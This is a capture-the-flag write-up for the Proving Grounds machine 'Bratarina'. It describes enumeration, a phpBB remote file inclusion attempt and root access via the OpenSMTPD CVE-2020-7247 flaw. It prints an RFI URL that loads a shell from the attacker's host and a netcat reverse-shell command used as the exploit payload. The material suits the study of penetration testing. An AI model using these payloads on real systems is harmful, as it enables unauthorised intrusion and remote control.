Bratarina
Source: Proving Grounds
OS: Linux
Community Rating: Intermediate
Enumeration & Reconnaissance
Autorecon revealed open ports:
SSH (22)
SMTP (25)
HTTP (80)
SMB (445)
Service Analysis
The HTTP site immediately stood out, but it was painfully slow—like click-and-wait-forever slow. I thought the machine was glitching, so I reverted it and restarted, but nothing changed. Maybe it was designed to be this way?
Found CVE-2007-3697, an RFI vulnerability in PHPBB's sendmsg.php:
http://192.168.111.71/phpbb/sendmsg.php?phpbb_root_path=http://192.168.45.157/shell.php

Tried repeatedly, but the site's sluggishness made exploitation impractical; it's probably a rabbit hole.
Gaining Initial Access
Frustrated, I shifted to SMTP. Nmap identified OpenSMTPD, and a quick CVE search revealed CVE-2020-7247, an RCE flaw.

I ran the exploit script with random commands. No response. Tried again with a different command, still nothing. On the third attempt, I tweaked the payload to get a shell back, and suddenly, my netcat listener lit up. A shell connected!
python cve.py 192.168.111.71 25 "busybox nc 192.168.45.157 22 -e sh"

Privilege Escalation
Not required: initial access provided immediate root privileges.
Lessons Learned
Persistence Pays: Multiple exploit attempts may be needed, even with valid CVEs.
SMTP Overlooked: Don't tunnel-vision on HTTP; check all services for vulnerabilities.
Slow Sites Might Be Red Flags: Sluggish responses might hint at misconfigurations or intentional hurdles.